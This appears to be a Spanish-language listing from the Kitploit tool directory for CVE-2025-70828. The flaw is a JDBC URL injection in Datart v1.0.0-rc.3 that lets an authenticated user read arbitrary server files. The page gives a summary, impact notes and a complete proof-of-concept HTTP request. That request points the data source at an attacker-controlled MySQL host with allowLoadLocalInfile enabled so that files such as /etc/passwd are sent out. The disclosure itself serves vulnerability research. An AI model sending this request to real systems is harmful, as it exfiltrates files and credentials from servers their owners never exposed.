Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 Inyección en la cadena de conexión JDBC que permite la lectura arbitraria de archivos | Kitploit
Herramientas/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 Inyección en la cadena de conexión JDBC que permite la lectura arbitraria de archivos

Ver Repositorio
4hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-70828

Resumen

Se descubrió una vulnerabilidad de lectura arbitraria de archivos en Datart v1.0.0-rc.3. La aplicación no valida correctamente la URL de conexión JDBC durante la configuración de la fuente de datos.

Detalles de la vulnerabilidad

Tipo de vulnerabilidad: Validación de entrada incorrecta (CWE-20) / Lectura arbitraria de archivos Versión afectada: Datart v1.0.0-rc.3 Gravedad: Alta (posible divulgación de información sensible)

Descripción

La vulnerabilidad existe en el módulo de configuración de fuentes de datos. La aplicación no sanea estrictamente el parámetro url en la configuración JDBC. Un atacante remoto con privilegios para configurar fuentes de datos puede inyectar parámetros maliciosos (específicamente allowLoadLocalInfile=true) en la URL JDBC.

Al apuntar la conexión JDBC a un servidor MySQL malicioso controlado por el atacante (Rogue MySQL Server), el atacante puede hacer que el cliente envíe archivos locales del servidor Datart al servidor del atacante.

Impacto

La explotación exitosa permite a un atacante autenticado leer archivos arbitrarios del sistema de archivos del servidor (por ejemplo, , archivos de configuración, código fuente), lo que potencialmente conduce al compromiso del servidor o a ataques adicionales.

/etc/passwd

Prueba de concepto (PoC)

  1. Configuración: El atacante configura un servidor MySQL malicioso capaz de explotar la función LOAD DATA LOCAL INFILE (por ejemplo, utilizando herramientas como rogue_mysql_server).
  2. Explotación: El atacante envía la siguiente solicitud al servidor Datart para probar la conexión:
root@kitploit:~
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
Descargar herramienta